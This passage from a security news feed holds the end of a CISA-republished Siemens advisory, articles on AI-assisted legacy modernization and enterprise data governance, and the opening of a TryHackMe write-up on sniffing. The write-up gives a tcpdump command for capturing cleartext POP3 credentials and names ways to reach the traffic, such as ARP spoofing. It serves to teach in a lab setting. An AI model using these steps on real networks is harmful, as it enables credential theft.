</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/73.html">CWE-73 External Control of File Name or Path</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-35535</a></h3>
<div class="csaf-accordion-content">
<p>In Sudo through 1.9.17p2 before 3e474c2, a failure of a setuid, setgid, or setgroups call, during a privilege drop before running the mailer, is not a fatal error and can lead to privilege escalation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-35535">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/271.html">CWE-271 Privilege Dropping / Lowering Errors</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.4</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-41918</a></h3>
<div class="csaf-accordion-content">
<p>The affected applications stores sensitive information in the browser cache when an authenticated user modify specific configurations. This could allow an authenticated attacker to access sensitive data stored in the browser.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-41918">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SINEC OS</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>RUGGEDCOM RST2428P (6GK6242-6PA00)</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Vendor fix</strong><br>Update to V4.0 or later version<br><a href="https://support.industry.siemens.com/cs/ww/en/view/110002573/">https://support.industry.siemens.com/cs/ww/en/view/110002573/</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/525.html">CWE-525 Use of Web Browser Cache Containing Sensitive Information</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.7</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Siemens ProductCERT reported these vulnerabilities to CISA.</li>
</ul>
<hr>
<h2>General Recommendations</h2>
<p>As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity</p>
<hr>
<h2>Additional Resources</h2>
<p>For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories</p>
<hr>
<h2>Terms of Use</h2>
<p>The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.</p>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the exploitation risk of this vulnerability.</p>
<p>Minimize network exposure for all control system devices and/or systems, and ensure they are not accessible from the internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolate them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most recent version available. Also recognize VPN is only as secure as its connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<hr>
<h2>Advisory Conversion Disclaimer</h2>
<p>This ICSA is a verbatim republication of Siemens ProductCERT SSA-253495 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.</p>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-06-02</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-06-02</td>
<td>1</td>
<td>Publication Date</td>
</tr>
<tr>
<td>2026-07-07</td>
<td>2</td>
<td>Initial CISA Republication of Siemens ProductCERT SSA-253495 advisory</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modernizing legacy IT with AI without triggering regulatory risk]]></title>
<description><![CDATA[AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.
...]]></description>
<link>https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651034/it-security-nachrichten/modernizing-legacy-it-with-ai-without-triggering-regulatory-risk/</guid>
<pubDate>Tue, 07 Jul 2026 11:36:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is accelerating modernization projects that previously required months of analysis. But in highly regulated organizations, an uncomfortable reality quickly emerges: The risk is no longer in converting the code, but in demonstrating that the new version still does exactly what the old one did.</p>



<p>Almost every management committee has made the same decision this year: to apply artificial intelligence to their systems. And almost all discover the same thing when they delve into the details: AI is easy to add to the periphery — a chatbot, a copilot, a dashboard — and very difficult to integrate where it really matters, which is the legacy core. In banking, insurance, and much of the public sector, that core is still COBOL on a mainframe, with decades of patches and documentation that, to put it mildly, is incomplete.</p>



<p>That’s precisely where the regulatory risk lies. And that’s where most projects go off the rails.</p>



<p>I’ve spent three decades in regulated sectors, and the pattern repeats itself. The IT team approaches modernization as a delivery problem — deliver quickly, close tickets, move to production — when in a regulated sector, the problem is compliance. Success isn’t measured by what you deliver, but by what you can defend. Changing that mindset is half the battle.</p>



<h2 class="wp-block-heading">The mirage of COBOL translated</h2>



<p>The promise is enticing. Today, a language model can read thousands of lines of COBOL, document them, explain them, and propose an equivalent in Java or Python in a fraction of the time it would take a human team. It works. I’ve seen it accelerate analyses that previously took weeks.</p>



<p>The problem isn’t the code. The problem is the business rules that no one ever wrote down. In a migration project in a highly regulated banking environment, the biggest risk wasn’t in the routines, but in a calculation exception that had been running for 15 years and wasn’t documented anywhere: It existed only in the code and in the mind of a now-retired analyst. When you ask a model to “translate” that, it doesn’t translate; it fills in the gap with what statistically seems correct. And it does so with impeccable certainty.</p>



<p>On a dashboard, a hallucination is a troublesome error. In a financial institution’s calculation engine, it’s a compliance incident, a customer complaint, and potentially a penalty from the regulator.</p>



<p>The temptation, precisely because the tool is so fast, is to skip the slow part: reconstructing that logic with someone who understands it. That’s the worst possible decision. The speed of AI is seductive precisely at the point where making a mistake is most costly.</p>



<h2 class="wp-block-heading">What the regulator expects — and what changed in May</h2>



<p><a href="https://www.csoonline.com/article/570091/eus-dora-regulation-explained-new-risk-management-requirements-for-financial-firms.html">DORA</a> has been in effect since January 2025 and is very clear: operational resilience, ICT asset management, business continuity, and third-party risk control. Modernizing the core addresses all four areas simultaneously. NIS2 adds the security and notification layer. And the AI ​​Regulation introduces its own framework when the system you deploy is high-risk.</p>



<p>Although DORA, <a href="https://www.csoonline.com/article/3568787/eus-nis2-directive-for-cybersecurity-resilience-enters-full-enforcement.html">NIS2</a>, and the EU AI ​​Regulation pursue different objectives, they share a common requirement: the ability to demonstrate control, traceability, and accountability over deployed systems. This is the link between the three frameworks, and it’s what a modernization project must protect from day one.</p>



<p>It’s important to clear up a recent misunderstanding here. With the <a href="https://data.europa.eu/en/news-events/news/eu-digital-omnibus-update-simplifying-europes-digital-rulebook" target="_blank" rel="nofollow">Digital Omnibus</a> agreement of May 2026, the high-risk obligations of Annex III are postponed until December 2027. Many executives have interpreted the headline — “EU delays AI Law” — as a reprieve. This is a dangerous interpretation. Transparency obligations still apply in August 2026, synthetic content marking comes into effect in December 2026, and, most importantly, the underlying risk remains unchanged. An erroneous automated decision in 2026 still falls under the GDPR, under sector-specific regulations, and under the jurisdiction of the relevant supervisor. The deadline has been moved; the responsibility has not.</p>



<h2 class="wp-block-heading">How to do it without triggering the risk</h2>



<p>I don’t have a magic formula, but I do have five principles that I apply to every project of this type:</p>



<ol class="wp-block-list">
<li><strong>Inventory before modernizing.</strong> You can’t secure or migrate what hasn’t been mapped. Assets, dependencies, data flows: If that map doesn’t exist, the first deliverable of the project is to build it, not write code.</li>



<li><strong>The AI </strong><strong>​​proposes, a person validates.</strong> The model accelerates the analysis and the first draft of the transformation. The critical business rule is confirmed by an engineer who understands the business, not the model. Where there is no one who understands it, it is reconstructed with the business area before anything is changed.</li>



<li><strong>End-to-end traceability.</strong> Every AI-generated transformation must be recorded: what went in, what went out, who approved it, and why. That’s not bureaucracy; it’s exactly what the auditor will ask for, and it’s what makes a change defensible.</li>



<li><strong>Be careful where you put the code.</strong> Dumping kernel source code into an external model is a data transfer and a confidentiality issue more than a technical one. DORA requires control over the third party; GDPR requires control over the data. This decision is made at the beginning of the project, not after it’s finished.</li>



<li><strong>Govern shadow AI.</strong> If the organization doesn’t offer a safe way to use AI, teams will use it anyway, on their own and without oversight. Governance isn’t about prohibition but about providing an enabled path.</li>
</ol>



<h2 class="wp-block-heading">Technological leadership has changed</h2>



<p>In a regulated sector, the CIO’s challenge is no longer simply to modernize legacy systems, but to do so in a way that withstands the scrutiny of auditors, regulators, and risk committees.</p>



<p>Leading one of these projects is no longer about coordinating deliveries; it’s about making the transformation defensible. It means saying no to a shortcut that would save two weeks but leave a gap without traceability. It means treating governance as an accelerator — because a well-documented change is approved faster — and not a brake.</p>



<p>AI is an extraordinary tool for organizations to overcome their legacy technical debt. But in banking, insurance, or public administration, uncontrolled speed is not an advantage: It’s a liability that surfaces at first inspection. Modernizing quickly can be a competitive advantage; modernizing with traceability, control, and defense capabilities is what makes it sustainable.</p>



<p>Therefore, I summarize what I’ve learned over the years as the following: A secure solution isn’t the slowest or the most expensive; it’s the one that survives the first audit.</p>



<p><em><a href="https://joseenrique.es/" rel="nofollow">José Enrique Ibarra</a> is Interim CIO and AI Project Manager, with three decades of experience leading IT in regulated sectors—banking, insurance, energy, and public administration. His focus is on governing digital transformation and AI adoption under the AI </em><em>​​Regulation, DORA, NIS2, GDPR, ISO 27001, and the Spanish National Security Framework (ENS), ensuring it withstands the scrutiny of auditors and regulators. He leads AI Forge, his applied AI initiative. He resides in Almería.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why trusted context is becoming the currency for enterprise AI]]></title>
<description><![CDATA[AI is getting most of the attention in enterprise technology. Governance, ownership, and data quality do most of the heavy lifting behind the scenes. And yet, as organizations move from AI experiments to production deployments, trusted context is becoming a key factor in determining whether agent...]]></description>
<link>https://tsecurity.de/de/3650969/ai-nachrichten/why-trusted-context-is-becoming-the-currency-for-enterprise-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3650969/ai-nachrichten/why-trusted-context-is-becoming-the-currency-for-enterprise-ai/</guid>
<pubDate>Tue, 07 Jul 2026 11:04:23 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is getting most of the attention in enterprise technology. Governance, ownership, and data quality do most of the heavy lifting behind the scenes. And yet, as organizations move from AI experiments to production deployments, trusted context is becoming a key factor in determining whether agents create business value — or operational risk.</p>



<p>That shift is reshaping how Salesforce, Microsoft, Snowflake, Databricks, SAP, Oracle, and others are positioning their data, governance, metadata, and integration services. The conversation is no longer just about models. It’s about whether AI systems can operate against trusted, governed, and business-relevant information.</p>



<p>Trusted context has become the new currency, and Salesforce has made a strategic commitment to it.</p>



<h2 class="wp-block-heading">Agentic AI is exposing the problems master data management was designed to solve</h2>



<p>Master data management (MDM) spent much of the last decade as an important but often overlooked infrastructure. AI is changing that. Agentic systems can identify duplicate records, inconsistent definitions, fragmented ownership, and poor governance the moment AI begins interacting with enterprise data and processes.</p>



<p>I recently wrote about <a href="https://www.forbes.com/sites/moorinsights/2026/01/15/weak-data-management-hinders-enterprise-ai-salesforce-research-shows/">Salesforce’s State of Data and Analytics research</a>, which found that 84% of data leaders believe their organizations need significant changes to their data strategies before AI can succeed at scale. That finding shows what many enterprises are now experiencing. AI often exposes data and governance issues that have existed for years.</p>



<p><a href="https://www.linkedin.com/in/manoujtahiliani/" data-type="link" data-id="https://www.linkedin.com/in/manoujtahiliani/">Manouj Tahiliani</a>, senior vice president for MDM at Informatica, now part of Salesforce, said, “Trusted context is becoming the new currency in enterprise AI.” His argument is that trusted context is the connected, governed view of customers, products, and suppliers that lets an agent act like a tenured employee. Models and agents will commoditize. Differentiation comes from how well an agent understands the enterprise, which depends on the data underneath. AI is not a model problem. It is a data foundation problem with an agent interface bolted on top.</p>



<h2 class="wp-block-heading">Salesforce is expanding its definition of the data layer</h2>



<p>Salesforce completed its acquisition of Informatica in November 2025. The acquisition strengthens Salesforce’s position around data quality, governance, metadata, lineage, and MDM. It also reflects the market reality. Every major enterprise platform provider is trying to create a trusted layer that connects operational systems, business context, and AI.</p>



<p>Marc Benioff, CEO of Salesforce, summarized the rationale when the deal closed. Organizations need trusted, connected, and governed data before they can expect meaningful outcomes from AI. While that statement may sound obvious, it reflects one of the biggest challenges organizations continue to face as AI moves into production.</p>



<p>The combined strategy brings together Tableau for analytics, MuleSoft for integration and Agent Fabric, Data 360 (formerly Data Cloud) for data unification, and Informatica for governance, quality, stewardship, and MDM. The goal is not simply data consolidation. The goal is creating a consistent layer of business context that can be used across applications, workflows, and AI systems. </p>



<p>Salesforce is not alone. Microsoft, for example, is building around Fabric, OneLake, Purview, and Fabric IQ. Snowflake continues expanding governance, semantic, and catalog capabilities. Databricks is advancing Unity Catalog and its broader Data Intelligence Platform strategy. SAP and Oracle are pursuing similar objectives through business applications and industry-specific data models. The competitive landscape is increasingly shifting from data storage and analytics toward trusted context, governance, and operational execution. </p>



<p>Early adoption metrics suggest the strategy is gaining traction, although long-term success will be measured by customer outcomes, implementation timelines, and operational value. Data 360 has grown within Salesforce, Agentforce adoption continues to expand, and deeper integration between Informatica, Data 360, and Agent Fabric is expected throughout 2026.</p>



<h2 class="wp-block-heading">Informatica extends governance into the agent era</h2>



<p>The Intelligent Data Management Cloud (IDMC) remains the foundation underneath Informatica’s data management strategy. It provides metadata-aware connectivity, governance, stewardship, matching, merging, and master data capabilities across applications, databases, files, and streaming sources.</p>



<p>For most enterprises, the number of connectors is less important than whether governance, ownership, quality, and lineage remain consistent across systems. Connectivity alone rarely solves data problems. Operational discipline does.</p>



<p>What is changing is how those capabilities are being exposed to AI systems. Salesforce and Informatica are positioning governance and data management services as capabilities that agents can access directly through <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> and related interfaces. The value is not the protocol itself. The value is allowing AI systems to interact with governed enterprise information while maintaining lineage, governance, ownership, and security controls.</p>



<p>Headless data management is also becoming more important. Organizations want agents, applications, and workflows to access trusted services without custom integrations for every use case. If executed effectively, that approach could simplify how AI systems consume enterprise data while preserving governance standards.</p>



<h2 class="wp-block-heading">Why many data programs continue to struggle</h2>



<p>Industry research has consistently shown that many MDM initiatives struggle to achieve their original business objectives. Governance arrives too late. Executive sponsorship is weak. Ownership remains unclear. Business units maintain competing definitions. Technology is expected to solve organizational problems.</p>



<p>One of the recurring issues I see across enterprises is that technology decisions often move faster than governance models. Organizations frequently deploy tools before establishing ownership, stewardship, and accountability. AI tends to expose those gaps very quickly.</p>



<p>The challenge becomes more complicated as enterprises deploy agents across ERP, CRM, finance, supply chain, and operational systems simultaneously. Visibility, accountability, and governance become increasingly important as AI systems move beyond recommendations and begin to influence business processes.</p>



<p>This is where Informatica’s Agent Fabric Context Catalog becomes relevant. The concept is less about cataloging technology and more about providing visibility into how agents are deployed, governed, monitored, and controlled.</p>



<p>Tahiliani offered advice that aligns with what I often tell clients. Start with business priorities. Translate those priorities into a data strategy. Then select the architecture and technology required to support it. Many organizations still approach the process in reverse, struggling to generate business value.</p>



<h2 class="wp-block-heading">The competitive landscape extends beyond traditional MDM</h2>



<p>MDM is not a single-vendor market. Gartner’s 2026 Magic Quadrant leaders include Salesforce (Informatica), Profisee, Reltio, Semarchy, and Stibo Systems. Each vendor approaches the market differently. Profisee remains closely aligned with Microsoft environments. Reltio, which SAP acquired in May 2026, continues to differentiate through graph-oriented architecture and API-first design. Semarchy brings strengths where integration and MDM converge. Stibo maintains a strong position in product information management and retail-focused environments.</p>



<p>Informatica’s key strengths continue to be its broad capabilities, mature governance, and growing alignment with Salesforce. The larger question is execution. Enterprises will want evidence that implementation timelines, governance complexity, and time-to-value improve as the roadmap evolves. </p>



<p>Historically, Informatica implementations have required significant investment, governance discipline, and organizational commitment. Salesforce will need to demonstrate that the combined strategy can simplify adoption while maintaining the governance rigor many customers expect.</p>



<h2 class="wp-block-heading">Yum Brands and TELUS show what trusted context looks like in practice</h2>



<p>Yum Brands, the parent company of KFC, Pizza Hut, Taco Bell, and Habit Burger Grill, operates more than 63,000 restaurant locations globally. According to company leadership, significant effort was being spent consolidating and cleansing location data before it could be used effectively across the business. Informatica MDM became a central component of the company’s modernization effort.</p>



<p>TELUS represents a different use case. The Canadian telecommunications and health services provider uses Informatica MDM Cloud Edition and Customer 360 to improve customer visibility across the organization. Integrating acquisition data into a unified customer view enabled more effective measurement of marketing performance and improved opportunities for targeted cross-sell initiatives.</p>



<p>Neither example proves the broader strategy on its own. Both illustrate a pattern that continues to emerge across enterprise AI initiatives. Data management investments create value when they improve operational execution, decision-making, and business outcomes rather than simply improving data quality metrics. </p>



<p>The common theme is that trusted information is becoming a foundational requirement for organizations attempting to scale AI, analytics, and operational decision-making.</p>



<h2 class="wp-block-heading">What Salesforce and enterprise buyers still need to prove</h2>



<p>The questions that separate successful data programs from costly tech projects are straightforward. Is there clear ownership for each data domain? Is governance embedded from the beginning rather than added later? Can governance and data management services be consumed directly by AI systems? Can compliance, security, and operational controls scale alongside AI adoption?</p>



<p>These questions matter more than any individual AI feature announcement. For Salesforce, the next phase requires measurable proof points. Customer references are encouraging, but enterprises will want audited outcomes, implementation metrics, and long-term operational results. I believe that success in enterprise AI won’t come from having the best model. Instead, it will come from the team with the clearest, best-governed data to support their efforts. This reflects how ERP systems are evolving, not being replaced, with an emphasis on enhancing the core data rather than just updating the technology.</p>



<p>Salesforce has made a decisive commitment to making trusted context essential to enterprise AI, setting a high standard that all other vendors must meet. The proof will not be in the keynotes. It will be in the stores Yum can finally report on, the households TELUS can finally sell into, and the next 10 customer stories about successful AI integration.</p>



<p>—</p>



<p><strong><em>Disclosure:</em></strong><em> KramerERP offers paid services to technology companies, similar to those provided by other technology research and analyst firms. These services include research, analysis, advisory services, consulting, benchmarking, acquisition matchmaking, video sponsorships, speaking sponsorships and other related activities. KramerERP has worked with, or is currently working with, companies mentioned in this article.</em><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Veeam feiert zehnjähriges Jubiläum als Marktführer im Gartner-Magic-Quadrant]]></title>
<description><![CDATA[Dieses Vertrauen ist entscheidend und kombiniert operative Ausfallsicherheit und Cyber-Resilienz mit der Fähigkeit, Daten sowohl in Produktions- als ...]]></description>
<link>https://tsecurity.de/de/3648995/it-security-nachrichten/veeam-feiert-zehnjaehriges-jubilaeum-als-marktfuehrer-im-gartner-magic-quadrant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648995/it-security-nachrichten/veeam-feiert-zehnjaehriges-jubilaeum-als-marktfuehrer-im-gartner-magic-quadrant/</guid>
<pubDate>Mon, 06 Jul 2026 16:09:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Dieses Vertrauen ist entscheidend und kombiniert operative Ausfallsicherheit und <b>Cyber</b>-Resilienz mit der Fähigkeit, Daten sowohl in Produktions- als ...]]></content:encoded>
</item>
<item>
<title><![CDATA[RedLine Stealer Trail Leads Researchers to Maritime BEC Campaign Against Kangrim Heavy Industries]]></title>
<description><![CDATA[Every great threat intelligence investigation starts with a single clue. While security platforms constantly deliver fresh indicators like IP addresses and malware hashes, the real magic happens when analysts pivot from these isolated data points to uncover entire attacker networks. Recently, a r...]]></description>
<link>https://tsecurity.de/de/3648141/it-security-nachrichten/redline-stealer-trail-leads-researchers-to-maritime-bec-campaign-against-kangrim-heavy-industries/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3648141/it-security-nachrichten/redline-stealer-trail-leads-researchers-to-maritime-bec-campaign-against-kangrim-heavy-industries/</guid>
<pubDate>Mon, 06 Jul 2026 10:08:44 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Every great threat intelligence investigation starts with a single clue. While security platforms constantly deliver fresh indicators like IP addresses and malware hashes, the real magic happens when analysts pivot from these isolated data points to uncover entire attacker networks. Recently, a routine check on a RedLine Stealer server led researchers down a fascinating path, […]</p>
<p>The post <a href="https://cyberpress.org/redline-targets-maritime-bec/">RedLine Stealer Trail Leads Researchers to Maritime BEC Campaign Against Kangrim Heavy Industries</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Protocols and Servers 2 TryHackMe Writeup]]></title>
<description><![CDATA[Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.No exploit. No zero-day. Just a protocol that was never built to keep a secret.That’s the uncomfortable little truth this room is built around. So le...]]></description>
<link>https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture 